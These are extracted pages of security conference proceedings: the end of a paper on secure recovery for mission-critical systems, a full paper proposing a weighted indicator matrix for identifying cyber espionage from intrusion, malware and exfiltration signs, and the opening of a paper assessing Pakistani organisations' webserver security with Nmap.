M=5 M=10 M=15 M=25<br />

0.3 0.5 0.65 0.95<br />

248.97 241.57 238.16 235.06<br />

This paper proposes a hardware based proactive solution to secure the recovery phase of mission<br />

critical applications. A detailed threat model is developed to analyze the security provided by our<br />

scheme. The biggest strengths of this research is its ability to deal with smart adversaries, give priority<br />

to mission assurance, and use redundant hardware for capturing integrity status of a replica outside<br />

the user space. Since this scheme is simple and has no visible application specific dependencies, its<br />

implementation has the potential to be application transparent. For performance evaluation, we<br />

investigated a simplified mission critical application prototype using a multi-step simulation approach.<br />

We plan to enhance the centralized architecture to a distributed system for our future research work.<br />

We defined cases to investigate the cost involved in applying our security scheme to all kinds of<br />

systems (including the legacy systems with no fault tolerance). The performance evaluation showed<br />

promising results and the cost/performance overhead is only a small percentage of the original<br />

execution times when faults are absent. As the rate of fault occurrence increases, the overhead<br />

increases too, but this additional overhead comes with fault tolerance and security. Overall, we<br />

believe that our solution provides strong security at low cost for mission critical applications.<br />

Acknowledgments<br />

This work was supported in part by ITT Grant No. 200821J. This paper has been approved for Public<br />

Release; Distribution Unlimited: 88ABW-2010-6094 dated 16 Nov 2010.<br />

References<br />

Abramovici, M. and Stroud, C.E. (2001) "BIST-based test and diagnosis of FPGA logic blocks", IEEE<br />

Transactions on VLSI Systems, volume 9, number 1, pages 159-172, February.<br />

Banatre, M., Pataricza, A., Moorsel, A., Palanque, P. and Strigini, L. (2007) From resilience-building to resiliencescaling<br />

technologies: Directions – ReSIST, NoE Deliverable D13. DI/FCUL TR 07–28, Dep. Of<br />

Informatics, Univ. of Lisbon, November.<br />

Bessani, A., Reiser, H.P., Sousa, P., Gashi, I., Stankovic, V., Distler, T., Kapitza, R., Daidone, A. and Obelheiro,<br />

R. (2008) “FOREVER: Fault/intrusiOn REmoVal through Evolution & Recovery”, Proceedings of the ACM<br />

Middleware'08 companion, December.<br />

Del Carlo, C. (2003) Intrusion detection evasion, SANS Institute InfoSec Reading Room, May.<br />

Elnozahy, E.N., Alvisi, L., Wang, Y. and Johnson, D.B. (2002) "A survey of rollback-recovery protocols in<br />

message-passing systems", ACM Computing Surveys (CSUR), volume 34 number 3, pages 375-408,<br />

September.<br />

Haeberlen, A., Kouznetsov, P. and Druschel, P. (2006) “The case for Byzantine fault detection”, Proceedings of<br />

the 2nd conference on Hot Topics in System Dependability, volume 2, November.<br />

Hrivnak, A. (2002) Host Based Intrusion Detection: An Overview of Tripwire and Intruder Alert, SANS Institute<br />

InfoSec Reading Room, January.<br />

Kalbarczyk, Z., Iyer, R.K., Bagchi, S. and Whisnant, K. (1999) "Chameleon: a software infrastructure for adaptive<br />

fault tolerance", IEEE Transactions on Parallel and Distributed Systems, volume 10, number 6, pages 560-<br />

579, June.<br />

Mehresh, R., Upadhyaya, S. and Kwiat, K. (2010) “A Multi-Step Simulation Approach Toward Fault Tolerant<br />

system Evaluation”, Third International Workshop on Dependable Network Computing and Mobile Systems,<br />

October.<br />

Patterson, D. and Hennessy, J. (1994) Computer Organization and Design: The Hardware/Software<br />

Interface, Morgan Kaufmann.<br />

Sousa, P., Bessani, A., Correia,M., Neves, N.F. and Verissimo, P. (2007) “Resilient intrusion tolerance through<br />

proactive and reactive recovery”, Proceedings of the 13th IEEE Pacific Rim Int. Symp. on Dependable<br />

Computing, pages 373–380, December.<br />

Todd, A.D., Raines, R.A., Baldwin, R.O., Mullins, B.E. and Rogers, S.K. (2007) “Alert Verification Evasion<br />

Through Server Response Forging”, Proceedings of the 10th International Symposium, RAID, pages 256-<br />

275, September.<br />

Wagner, D. and Soto, P. (2002) “Mimicry attacks on host-based intrusion detection systems”, Proceedings of the<br />

9th ACM conference on Computer and communications security, November.<br />

179


Identifying Cyber Espionage: Towards a Synthesis<br />

Approach<br />

David Merritt and Barry Mullins<br />

Air Force Institute of Technology, Wright Patterson Air Force Base, Ohio, USA<br />

david.merritt@afit.edu<br />

barry.mullins@afit.edu<br />

Abstract: Espionage has existed in many forms for as long as humans have kept secrets. With the skyrocketing<br />

growth of digital data storage, cyber espionage has quickly become the tool of choice for corporate and<br />

government spies. Cyber espionage typically occurs over the Internet with a consistent methodology: 1) infiltrate<br />

a targeted network, 2) install malware on the targeted victim(s), and 3) exfiltrate data at will. Detection methods<br />

exist and are well-researched for these three realms: network attack, malware, and data exfiltration. However,<br />

formal methodology does not exist for identifying cyber espionage as its own classification of cyber attack. This<br />

paper proposes a synthesis approach for identifying targeted espionage by fusing the intelligence gathered from<br />

current detection techniques. This synthesis of detection methods establishes a formal decision-making<br />

framework for determining the likelihood of cyber espionage.<br />

Keywords: covert channel, cyber espionage, data exfiltration, intrusion detection, malware analysis<br />

1. Introduction and background<br />

The cyber espionage threat is real. Because of the low cost of entry into and the anonymity afforded<br />

by the Internet realm, any curious or incentivized person can steal secret information off private<br />

computer networks (US-China, 2008). If a spy steals proprietary knowledge of a private company's<br />

innovative product research and development, then this data holds a high monetary value, reportedly<br />

billions of dollars, to an industry competitor (Epstein, 2008). If that stolen information is sensitive to<br />

national defense or national strategy decision-making, then the value is arguably immeasurable.<br />

A consistently effective defense against cyber espionage requires a consistently effective way to<br />

identify it. While there are methodologies to detect facets of cyber espionage, there is no formal<br />

approach for identifying cyber espionage as a stand-alone network event classification in its own right.<br />

This paper proposes a new approach that uses the synthesis of current cyber warfare detection and<br />

analysis techniques in a framework to holistically identify malicious or suspicious network events as<br />

cyber espionage.<br />

Due to the myriad of network attack methods and traditional espionage techniques, this paper cannot<br />

comprehensively address all techniques that a cyber spy would employ to achieve his mission (e.g.,<br />

insider threat or physical access). Instead, the paper focuses on the most common method of<br />

performing cyber espionage from a remote location outside the victims’ local network. Historically, the<br />

most common method for infiltrating a network for this purpose is through targeted spear phishing<br />

emails with malicious file attachments (SANS Institute, 2008). Both the emails and attachments are<br />

products of effective social engineering methods that tailor the content to the recipients of the emails.<br />

When an unsuspecting, targeted user opens the attachment, the malware, and therefore the cyber<br />

spy, establish a foothold on the computer and affected network. The spy can then use his specialized<br />

malware to search for interesting data on the victim computer and network and exfiltrate this<br />

potentially sensitive data from the victim network to a place of his choosing.<br />

The synthesis approach and decision-making framework proposed in this paper allows a network<br />

defender to correctly identify this kind of targeted cyber espionage event. If this methodology is to<br />

catch cyber spies targeting specific victims, then this detection approach must look at each malicious<br />

activity (i.e., network infiltration, malware installation, and data exfiltration) within the context of the<br />

whole espionage event. This approach does not attempt to introduce new ways to detect network<br />

attacks, malware infections, or data exfiltration beyond the bounds of the current field of research.<br />

Rather, the current detection methods are integrated in a new way that yields a synthesis approach to<br />

categorize cyber espionage events. The paper first discusses techniques to detect each of the spy's<br />

three steps to espionage success, and then the synthesis approach and resulting framework are<br />

explained. Section 2 reviews network infiltration detection methods. Section 3 looks at detecting<br />

malware on a computer. Section 4 discusses the detection of data exfiltration. Section 5 poses the<br />

synthesis detection approach, followed by a conclusion and discussion of future work in Section 6.<br />

180


2. Network infiltration detection<br />

David Merritt and Barry Mullins<br />

Intrusion detection helps us answer the question: “Is there a malicious intrusion into the network?”<br />

Because there are countless manual and automated mechanisms to identify suspicious network<br />

behavior, this section will only discuss the most common techniques for intrusion detection. This<br />

glimpse into intrusion detection serves as a backdrop for the explanation of the synthesis approach,<br />

which assumes that network infiltration can be detected somewhat reliably.<br />

A network-based intrusion detection system (NIDS) detects network-oriented attacks and traditionally<br />

monitors the access points into a network. If a cyber spy chooses a common network attack method<br />

to infiltrate a network, such as a common buffer overflow exploit, then the NIDS will have a high<br />

detection success rate (Patcha and Park, 2007: 3448-3470). If there is a novel or sophisticated attack<br />

that is difficult to detect, NIDS relies on its anomaly detection capability. Kuang and Zulkernine (2008:<br />

921-926) have shown that an anomaly-based NIDS employing the Combined Strangeness and<br />

Isolation measure K-Nearest Neighbors algorithm can accurately identify novel attacks at a detection<br />

rate of 94.6%, where the detection rate is defined as the ratio of correctly classified network intrusion<br />

samples to the total number of samples.<br />

3. Malware detection<br />

Malware detection helps us answer the question: “Is there something malicious happening on a<br />

host?” This section is not an exhaustive survey of all malware detection mechanisms and methods.<br />

Rather, it simply makes evident the fact that there are numerous ways to reliably detect most malware<br />

on a system. Malware comes in many forms with many names. For simplicity and convenience, we<br />

will refer to any unwanted and malicious program or code running on a system as malware. Naturally,<br />

detection of unknown malware is the goal, assuming the cyber spy will use sophisticated, novel<br />

malicious programs to establish footholds on a computer and within a network.<br />

3.1 Antivirus<br />

Antivirus, or anti-malware, software does not need much explanation as it is a commonly used and<br />

moderately understood term. Antivirus products rely primarily on signature-based detection, although<br />

most products have integrated at least a rudimentary mechanism for behavioral analysis of<br />

executables. The vast majority of known malware is caught by commodity software. As a point of<br />

reference, most antivirus products have proven they can detect malware in sample sizes of over one<br />

million with accuracy in the upper 90 th percentile (Virus Bulletin, 2008).<br />

3.2 Malware analysis<br />

There are historically two methods of analyzing unknown programs, or binaries: static and dynamic<br />

(Ding et al, 2009: 72-77). Static analysis starts with the conversion of a program from its binary<br />

representation to a more symbolic, human-readable version of assembly code instructions. This<br />

disassembly ideally takes into account all possible code execution paths of the unknown program,<br />

which provides a reverse engineer with the complete set of program instructions and therefore inner<br />

workings of the unknown program’s code. Analyzing this code to discover a program’s purpose and<br />

capabilities makes up the bulk of static analysis. Christodorescu et al (2005: 32-46) and Kruegel,<br />

Robertson and Vigna (2004: 91-100) discuss a couple effective approaches in using this kind of<br />

analysis to detect and classify unknown malware.<br />

On the other hand, analyzing the code during execution is called dynamic analysis. Dynamic analysis<br />

is effective against binaries that obfuscate themselves or are self-modifying. This is due to the fact<br />

that the destiny of all programs is to be run on a system, so when the program is running, its behavior<br />

and subsequent system modifications can be seen. Willems, Holz and Freiling (2007: 32-39) and<br />

Bayer et al (2006: 67-77) discuss dynamic analysis techniques that are successful in detecting<br />

unknown malware. Also, Rieck et al (2008: 108-125) used a learning based approach to automatically<br />

classify 70% of over 3,000 previously undetected malware binaries.<br />

4. Data exfiltration detection<br />

Data exfiltration detection helps us answer the question: “Is someone stealing data off the network?”<br />

Detecting suspicious and outright malicious events in the realm of data exfiltration is arguably the<br />

most difficult but most important to achieve out of the three steps of cyber espionage. Because the<br />

existence of a computer network implies the need for data to be accessed both inbound to and<br />

181


David Merritt and Barry Mullins<br />

outbound from a network, the task of identifying a “bad” stream of data leaving the network amidst a<br />

flood of “good” data is daunting.<br />

Many convenient overt channels exist with the Internet. With a significant bulk of network traffic on<br />

any given local network being Internet-related, any web-based protocol offers a readily available overt<br />

channel within which a spy can easily exfiltrate stolen data. The sheer amount of web traffic makes it<br />

easy to hide the communication channel—the data is just one animal in a herd at that point.<br />

Fortunately, custom signatures can be generated for specific, sensitive data that would trigger a NIDS<br />

alert if this data were detected on its way out of a network (Liu, 2008).<br />

Thanks to several innovative research efforts, it is possible to detect many kinds of covert channels.<br />

Gianvecchio and Wang (2007) use a corrected conditional entropy (CCE) approach to accurately<br />

detect covert timing channels in HTTP (hypertext transfer protocol) traffic. Similarly, Cabuk, Brodley,<br />

and Shields (2009) use a measure of compressibility to distinguish covert timing channel traffic from<br />

conventional web-based traffic. While there are a multitude of other types of covert channels, like<br />

those using packet header fields or timestamps, there are approaches to eliminate, reduce, or at least<br />

detect these (Zander, Armitage, and Branch, 2007: 44-57).<br />

5. Synthesis detection approach<br />

From the perspective of preventing the compromise of sensitive information, it is crucial to determine<br />

if anomalous, suspicious, or malicious occurrences are part of a cyber espionage attempt or not. In<br />

other words, to prevent cyber espionage, one must first be able to identify it reliably. However, there is<br />

a surprising lack of research focused on identifying or labeling network events as cyber espionage.<br />

The Defense Personnel Security Research Center (PERSEREC) produced a technical report in 2002<br />

on 150 cases of espionage against the United States by American citizens (Herbig and Wiskoff,<br />

2002). The Defense Intelligence Agency's (DIA) Counterintelligence and Security Activity (DAC) used<br />

the results of PERSEREC's report to produce a guide to aid its employees in reporting potential<br />

espionage-related behaviors in their colleagues (Office 2007). Essentially, the DIA relies on a<br />

synthesis of indicators to aid in its detection of spies.<br />

This paper adopts the same synthesis approach to detecting cyber espionage. Operating under the<br />

premise that cyber espionage emits telltale signs, the search for these indicators begins by looking at<br />

a series of questions with, hopefully, intuitive and obvious answers that lead to a framework of<br />

measurement.<br />

5.1 How would a spy infiltrate a network?<br />

If an attacker were only concerned with gaining access into a network, he would justifiably launch as<br />

many attacks against as many victims as possible. This increases his likelihood of success. But this<br />

torrent of binary madness will also draw much attention. A cyber spy who intends to steal sensitive<br />

information from a network will typically take a more streamlined avenue into the network, one that is<br />

less noisy and has a higher probability of success. This mentality and intention will drive the spy to<br />

use more strategy in choosing his attack tools and methods. Also, based on the spy’s knowledge of<br />

his victims and his desire to evade detection, he will target a relatively small number of victim<br />

systems. Spear phishing emails sent to a handful of selected victims is indicative of espionage. In<br />

addition, if the content of the email is tailored to be very specific and relevant to the industry, then this<br />

would be a telltale sign of cyber espionage. This thought process reveals a couple indicators we can<br />

use to distinguish network intrusions that are highly probable espionage events from those that are<br />

not: targeted and tailored.<br />

5.2 What kind of malware would a spy use?<br />

If an attacker just wanted to infect as many machines as possible to expand his ever-growing botnet,<br />

this attacker's malware of choice would eventually run rampant and widespread across the Internet, or<br />

else it would not accomplish its master's goal. Looking at the other end of the spectrum, assuming a<br />

spy would want to evade detection and maintain persistent, reliable access to data, the spy would<br />

probably choose malware that is not easily detectable. Malware that is very well known is likely not<br />

the strategically-chosen tool of a cyber spy. In addition, since the name of the espionage game is to<br />

obtain information, it would make sense for espionage-related malware to have some sort of datagathering<br />

functionality. Furthermore, if the malware is sophisticated enough to change tactics or focus<br />

182


David Merritt and Barry Mullins<br />

on certain information upon receiving new commands from the attacker, then this would be an even<br />

stronger indicator of espionage. Essentially, we have established two more indicators to find probable<br />

espionage malware: detectability and information-gathering.<br />

5.3 How would a spy exfiltrate data?<br />

We have already discussed that there are many ways to move data out of a network. In fact, the ease<br />

of data transfer is an underlying measure of network usefulness. If a typical network attacker were<br />

only concerned with collecting data regardless of who else sees it, then he may choose the most<br />

convenient avenue of data exfiltration. A cyber spy would want to follow the same mentality portrayed<br />

in his choice of network intrusion and malware infection techniques. That is, the spy would probably<br />

prefer to evade detection altogether, or at least attempt to hide his needle in the haystack of network<br />

traffic. In addition, the spy would most likely prefer to hide the data itself while it is transiting the<br />

network. Sending the stolen information over the network in clear text may reveal too much of his<br />

intent.<br />

Naturally, the spy would want to make his efforts worthwhile—the more data he can steal, the more<br />

worthwhile the mission. A spy who collects all information pertaining to a certain product will surely be<br />

sending relatively large amounts of data outbound, and his intentions would be difficult to detect if the<br />

data were encrypted. Clearly, very large amounts of encrypted data emitting from a network warrants<br />

a closer look, and this method of data exfiltration seems fairly spy-like. If this data could be decrypted<br />

to uncover very specific information relevant to the industry, especially if it is private or proprietary,<br />

then this is surely a telltale sign of espionage. In fact, this metric of industry-specific information is a<br />

strong indicator by itself. But it may not always be possible to decrypt the data in a timely manner, so<br />

we must include this indicator with other indicators of data exfiltration.<br />

Inherently, hiding the very existence of a communication channel screams of the intent to evade<br />

detection and, thus, warrants a closer look. Suffice it to say that the use of a covert channel is very<br />

spy-like. Therefore, more espionage indicators have been uncovered pertaining to data exfiltration:<br />

channel covertness, transfer size, encryption, and relevance of information.<br />

5.4 Espionage identification framework<br />

The following is a summary of potential indicators for cyber espionage:<br />

Intrusion:<br />

Targeted with selective victims<br />

Tailored through social engineering<br />

Malware:<br />

Novel or unknown<br />

Information/data-stealer<br />

Exfiltration:<br />

Covert channel<br />

Encrypted data or channel<br />

Large amount of data<br />

Industry-specific information<br />

These indicators can be used as an objective framework for subjective decision-making concerning<br />

the probability of espionage for a given event. An overall event that satisfies every intrusion, malware,<br />

and exfiltration indicator is likely espionage-related, but a cyber espionage event may not explicitly<br />

fulfill each and every indicator. In other words, the absence of one of these indicators does not<br />

automatically preclude an overall event from being attributable to cyber espionage.<br />

Given this framework, if there is a way to detect and subsequently score each individual intrusion,<br />

malware, or exfiltration event, then one can calculate a synthesis of those scores to categorize the<br />

overall intrusion + malware + exfiltration event. Taken a step further, if this synthesis score is related<br />

183


David Merritt and Barry Mullins<br />

to the probability of cyber espionage, it is possible to use this score to measure the probability of the<br />

entire event as being cyber espionage.<br />

It is important to note that an individual event detected by itself may not express outright if a<br />

circumstance is cyber espionage-related or not. A targeted, socially-engineered intrusion might be a<br />

sophisticated spam or phishing attempt. New and undetected information-stealing malware could be a<br />

new variant of benign adware. A consistent transfer of significant amounts of encrypted data could<br />

end up being an authorized VPN (virtual private network) connection. The subtlety of a covert channel<br />

may be difficult to detect or declare with certainty its intentions, but it does serve as an impetus to<br />

investigate further to determine the context of the channel.<br />

The advantage behind this synthesis approach is that intrusion, malware, or exfiltration detection can<br />

be viewed within the context of the whole event. Not doing so could lead to incorrect conclusions<br />

being drawn from insufficient context. But each step of a cyber spy's attack methodology is not of<br />

equal value to the investigator. For instance, it is a challenge to judge the intent of malware simply by<br />

looking at its detectability and functionality. Many malicious programs have the same functionality but<br />

are used for different purposes. In fact, many legitimate programs are frequently used maliciously<br />

(e.g., Remote Administration Tools). On the contrary, a targeted intrusion that is industry-relevant<br />

hints at the intentions of the adversary—to quietly get to specific targets. Thus, the intrusion factor<br />

should be weighted more than the malware “factor”. Similarly, with data exfiltration detection,<br />

covertness of the channel and sensitivity of the data are significant factors affecting the<br />

characterization of espionage. These factors' weights should have more weight than the malware<br />

installation factor.<br />

This strategic weighting of indicators is integrated to establish the Espionage Probability Matrix (EPM)<br />

framework, shown in Table 1. The EPM is used to determine an EPM score based on varying degrees<br />

of espionage probability, as indicated by the three columns of High, Medium, and Low Probability.<br />

Each indicator is assigned a value associated with its column, with High, Medium, and Low indicators<br />

being assigned values of 3, 2, and 1, respectively. The values for the indicators (e.g., targeted and<br />

tailored network intrusion) within each factor (e.g., Intrusion) are averaged to provide an EPM score<br />

for that factor. For example, a network intrusion that is not targeted at a specific user/group but<br />

contains somewhat tailored content results in an Intrusion factor EPM score of 1.5. This is calculated<br />

by averaging the “Not targeted” indicator (i.e., 1) with the “Potentially tailored” indicator (i.e., 2).<br />

Table 1: Espionage Probability Matrix (EPM)<br />

Intrusion<br />

Malware<br />

Exfiltration<br />

High Probability Medium Probability Low Probability<br />

Targeted; specific victims<br />

Tailored; social engineering<br />

required<br />

Novel or unknown<br />

Advanced info/data- stealer<br />

Covert channel<br />

Custom encryption<br />

Significant data transfer<br />

Industry-specific<br />

Potentially targeted<br />

Potentially tailored; social<br />

engineering may be used<br />

Not well known; variant of<br />

known<br />

Info/data- stealer<br />

Attempts to hide channel<br />

Standard encryption<br />

Non-trivial data transfer<br />

Partially industry-specific<br />

Not targeted<br />

Well-known methods<br />

Well known<br />

Not info/data-stealer<br />

No attempt to hide channel<br />

Not encrypted<br />

Negligible data transfer<br />

Not industry-specific<br />

The Intrusion row has a α multiplier, where α > 1, to represent the relative importance of intrusion<br />

classification to the overall EPM score. The Exfiltration row has a β multiplier, where β > 1, to<br />

represent the relative importance of data exfiltration classification to the overall EPM score. This<br />

effectively assigns greater importance to the factors that deserve it, as discussed. These individual<br />

probabilities are brought into context of the entire event by calculating an overall EPM score using the<br />

following equation:<br />

EPM Score = α·Intrusion + Malware + β·Exfiltration<br />

184


David Merritt and Barry Mullins<br />

Essentially, summing the individual weighted scores yields a “grade” for intrusion, malware, and<br />

exfiltration classification taken within the context of one another. For the purpose of this paper, a<br />

notional α multiplier of 2 and a β multiplier of 3 are used to illustrate the effectiveness and flexibility of<br />

this synthesis approach. Operationally, these values can be fine-tuned and adjusted as needed.<br />

However, this score has little value without a translation to what it could mean. The EPM score is<br />

used in the Espionage Threshold Matrix (ETM), shown in Table 2.<br />

Table 2: Espionage Threshold Matrix (ETM), assuming α=2 and β=3<br />

Overall Probability of<br />

Cyber Espionage<br />

EPM Score<br />

High Probability ≥12<br />

Medium Probability ≥9<br />

Low Probability


David Merritt and Barry Mullins<br />

2010). The attackers use social engineering and target source code and intellectual property (Stamos<br />

2010: 1). This attack receives the maximum Intrusion and Malware EPM scores. In the absence of full<br />

details, we assume the exfiltration channel uses standard encryption, and the amount of data<br />

transferred is not significant from the perspective of each individual company. Exfiltration receives a<br />

score of 2.5 to produce an overall EPM score of 16.5. This is well above the threshold for high<br />

probability of cyber espionage, according to the ETM.<br />

The scores of the EPM and thresholds of the ETM can be tuned according to a user's tolerance of<br />

false positives, false negatives, or strength of desire to prevent sensitive data loss. The ETM score<br />

can be a critical decision-making tool for network defenders and data owners who understand the<br />

importance of identifying cyber espionage using a reliable, consistent, and robust framework based<br />

on an innovative synthesis approach.<br />

6. Conclusion and future work<br />

This paper discusses the significant threat of cyber espionage and the importance of identifying and<br />

attributing activities to cyber espionage. The paper introduces a new synthesis approach and<br />

framework for identifying cyber espionage that fills the void in this research area due to the lack of<br />

formal methods for holistically determining cyber espionage events. This new approach capitalizes on<br />

current detection capabilities and integrates their results into a framework called the EPM. This<br />

framework takes into account the context of individual events to determine the likelihood of cyber<br />

espionage by using the ETM.<br />

Because this synthesis approach is the first formal methodology for categorizing holistic network<br />

events as cyber espionage, there are several questions that it begs. Is this framework effective if all<br />

three steps of espionage cannot be detected or they are detected out of order (e.g., exfiltration is the<br />

initial indicator of a suspicious event)? On effectiveness, how is it measured, and is there a more<br />

effective or efficient algorithm or methodology for identifying cyber espionage? Is it possible to<br />

automate the entire model, or will manual, human-in-the-loop processes always be needed?<br />

To help answer these questions, this approach and framework should be put to experiment, tested,<br />

and analyzed. It will surely be helpful to create an automated system that gathers data, alerts, and<br />

other relevant information from network and host-based sensors as well as from human analysis and<br />

inputs. In addition, observing additional real-world espionage-related malware and network intrusions<br />

is important to measuring the effectiveness of this model and answering the questions posed above.<br />

Acknowledgements<br />

This research is funded by the Center for Cyberspace Research at the Air Force Institute of<br />

Technology and the 688 th Information Operations Wing at Lackland Air Force Base, Texas. The views<br />

expressed in this paper are those of the authors and do not reflect the official policy or position of the<br />

United States Air Force, Department of Defense, or the U.S. Government.<br />

References<br />

Cabuk, S., Brodley, C. E. and Shields, C. ‘IP Covert Channel Detection’, ACM Trans. Information and Syst.<br />

Security, vol. 12, no. 4, article 22, Apr. 2009.<br />

Ding, J., Jin, J., Bouvry, P., Hu, Y. and Guan, H. ‘Behavior-based Proactive Detection of Unknown Malicious<br />

Codes’, 2009 4 th Int. Conf. Internet Monitoring and Protection, Venice/Mestre, Italy.<br />

Epstein, K. (2008, Dec. 7) ‘U.S. Is Losing Global Cyber War, Commission Says’, BusinessWeek, [Online],<br />

Available: http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_<br />

817606.htm?chan=top+news_top+news+index+-+temp_ dialogue+ with+readers.<br />

Gianvecchio, S. and Wang, H. ‘Detecting Covert Timing Channels: An Entropy-Based Approach’, Proc. 14th<br />

ACM Conf. on Computer and Communications Security, Alexandria, Virginia, October 28-31, 2007.<br />

Herbig, K. and Wiskoff, M ‘Espionage Against the United States by American Citizens’, TRW Systems, Defense<br />

Personnel Security Research Center, Monterey, CA, Tech. Rep. 02-5, July 2002.<br />

Keizer, G. (2010, Sep. 15) ‘Google hackers behind Adobe Reader PDF zero-day bug, Symantec warns’, [Online],<br />

Available: http://news.techworld.com/security/3239606/google-hackers-behind-adobe-reader-pdf-zero-daybug-symantec-warns/<br />

Kuang, L.L. and Zulkernine, M. ‘An anomaly intrusion detection method using the CSI-KNN Algorithm’, in Proc.<br />

2008 ACM Symposium on Applied Computing, Fortaleza, Ceara, Brazil, March 16-20.<br />

Liu, T., Corbett, C., Chiang, K., Archibald, R., Mukherjee, B. and Ghosal, D. ‘Detecting Sensitive Data Exfiltration<br />

by an Insider Attack’, Proc. 4th Annu. Workshop on Cyber Security and Information Intelligence Research:<br />

186


David Merritt and Barry Mullins<br />

Developing Strategies to Meet Cyber Security and Information Intelligence Challenges Ahead, Oak Ridge,<br />

TN, May 12-14, 2008, vol. 288, no. 16.<br />

Office of the National Counterintelligence Executive (2007, Mar.) ‘Your Role in Combating the Insider Threat’,<br />

[Online], Available: http://www.ncix.gov/archives/docs/Your_Role_in_Combating_the_ Insider_Threat.pdf.<br />

Patcha, A. and Park, J. M. “An overview of anomaly detection techniques: Existing solutions and latest<br />

technological trends,” Computer Networks, vol. 51, no. 12, Aug. 2007.<br />

Rieck, K., Holz, T., Willems, C., Dussel, P. and Laskov, P. ‘Lecture Notes in Computer Science’, Detection of<br />

Intrusions and Malware, and Vulnerability Assessment, vol. 5137, Berlin/Heidelberg, Germany: Springer,<br />

2008.<br />

SANS Institute (2008) ‘Top Ten Cyber Security Menaces for 2008’, [Online]. Available:<br />

http://www.sans.org/2008menaces/.<br />

Stamos, A. (2010) ‘”Aurora” Response Recommendations’, iSEC Partners, Inc.<br />

2008 Report to Congress, [Online], http://www.uscc.gov/annual_report/2008/annual_report _full_08.pdf<br />

Virus Bulletin Ltd. (2008, Sept. 2) ‘AV-Test Release Latest Results’, Virus Bulletin, [Online], Available:<br />

http://www.virusbtn.com/news/ 2008/09_02.<br />

Zander, S., Armitage, G., Branch, P. ‘A Survey of Covert Channels and Countermeasures in Computer Network<br />

Protocols’, IEEE Communications Surveys and Tutorials, vol. 9, no. 3, 2007.<br />

Zetter, K. (2010, Jan. 14) ‘Google hack attack was ultra sophisticated, new details show’, [Online], Available:<br />

http://www.wired.com/threatlevel/2010/01/operation-aurora/.<br />

187


Security Analysis of Webservers of Prominent<br />

Organizations of Pakistan<br />

Muhammad Naveed<br />

Free Lance Research, Pakistan<br />

mnaveed29@gmail.com<br />

Abstract: Insecure webservers are a serious threat to the organization’s repute and resources. Successful attack<br />

on webservers can destroy the trust of customers or people getting services from the organization. Webservers<br />

were selected for this study because they provide easily accessible entrance to the network from the Internet and<br />

security of webservers should be considered as an index to assess the organization’s overall information security.<br />

This study analyzes the webservers of prominent organizations of Pakistan to assess their level of security.<br />

Webservers of different types of organizations were selected to provide a general view of security of Pakistani<br />

webservers. The selected webservers were of the organizations who should be first to secure their webservers as<br />

they are the leaders in their respective fields in the country. So, all the smaller organizations can be assumed to<br />

have much lesser concern for security. Benchmark for every type of organization was first established to compare<br />

the results of the analysis with it. Nmap scanner was used to scan the webservers for security threats. The results<br />

reveal that the webservers in Pakistan are not secure and there is extreme need of awareness about information<br />

security in the country. The lack of importance given to information security can lead to cyber terrorism and might<br />

create lot of troubles for the country.<br />

Keywords: information security, analysis, security threats, Webserver, Pakistan, Nmap<br />

1. Introduction and background<br />

Security is one of the fundamental requirements for each and every network, just like it is the<br />

requirement for each and every human. Without proper security, a network is just like a house without<br />

doors and windows. In case the network has a lot of valuable information and resources, it’s like a<br />

bank full of money without any guards and security cameras. Just like the bank in the example will be<br />

a serious place for potential theft or robbery, same is the case with the insecure networks. But, there<br />

is much difference in human perceptions about the unsafe bank and insecure networks. People don’t<br />

understand the ultimate results of insecure networks and in Pakistan the situation is worst.<br />

Businesses and individuals don’t even consider it to be an element that needs consideration.<br />

Negligence in information security can have terrible consequences. It is not difficult to imagine the<br />

chaos created if an ill-intentioned person gains access to the country’s most trusted news channel’s<br />

website. Let’s suppose he just adds one single headline that a bomb has been placed at a specified<br />

place in the city or on some road side, what would be the troubles faced by the people? Let’s take<br />

another example, if he just adds one line that prime minister has said that we are going to attack our<br />

neighbor soon, which may end up in bloody feud between the two countries or at least create<br />

misunderstandings between the countries and can seriously damage the relationships between the<br />

countries. Trend Micro Data–stealing malware focus report of June 2009 says, “In March 2008, data<br />

from 4.2 million credit card numbers were stolen in transmission as a result of malware installed on all<br />

of Hannaford Brothers’ servers in 300 stores”. (Trend Micro 2009) There are hundreds of other<br />

examples of attacks performed to achieve malicious objectives.<br />

The study analyzes the webservers of famous and most reputable organizations of the country. Three<br />

types of organizations were considered for the study: Education and Research, Commercial<br />

Organizations and News channels. Benchmark is first set by analyzing the world’s respectable<br />

organizations and whose analysis shows their webservers to be almost completely secure.<br />

Benchmark is set, so that the results can be compared with them. Exactly similar Pakistani<br />

organizations’ webservers as the organizations used to set benchmarks were analyzed to give an<br />

insight about the information security awareness in the country. Organizations selected for analysis<br />

should be first to implement security on the basis of their status and business capacity. Webservers<br />

were selected because they can be easily analyzed from Internet and analysis of webservers<br />

provides insight for the complete network security of the organization. Nmap scanner was used to get<br />

the results. The identity of the Pakistani organizations analyzed is kept secret because of the possible<br />

damage to the repute of the organization. But, it is simple to use Nmap scanner to analyze any<br />

organization’s web server and getting almost the similar results for many organizations of the similar<br />

type. So, the results are basically an indicator of the security awareness on a large scale.<br />

188


Muhammad Naveed<br />

Pakistan Computer Emergency Response Team’s list of only reported hacked Pakistani websites<br />

from 1999 to 2005 is available on (PakCert 2005). Statistics of hacked Pakistani websites is shown in<br />

Figure 1. (PakCert 2008) Recently, many important websites of Pakistan were hacked including<br />

website of Supreme Court of Pakistan, Pakistan Navy and lot of others websites of extremely<br />

important organizations. (PakCert, 2005; PakCert, 2008; The Express Tribune, 2010; Jahanzaib,<br />

2010; GEO Pakistan, 2010; DawnNews, 2010)<br />

Figure 1: Statistics of hacked Pakistani websites (only .PK TLD) (PakCert (2008), ‘Defacement<br />

Statistics (January 1999 - August 2008)'’, Pakistan Computer Emergency Response<br />

Team)<br />

Paper is organized as: Section 2 gives the related work, section 3 shows the experimental setup used<br />

for the study, section 4 explains different port states shown by Nmap, section 5 sets the benchmarks<br />

for comparison, section 6 shows the actual analysis of web servers in Pakistan, and section 7<br />

concludes the paper and gives the simple solution to rectify the security problems.<br />

2. Related work<br />

There is very little work done on analyzing information security of Pakistani organizations. To the best<br />

of my knowledge the first study to address the concern about the need of information security in<br />

Pakistan is (Syed 1998) which proposes that it is very important for Pakistan to have both offensive<br />

and defensive Information Warfare capabilities.(Syed 1998)<br />

Vorakulpipat, C. et. al have explored information security practices in Thailand and have emphasized<br />

the need for information security benchmarking of an organization with best security practices.<br />

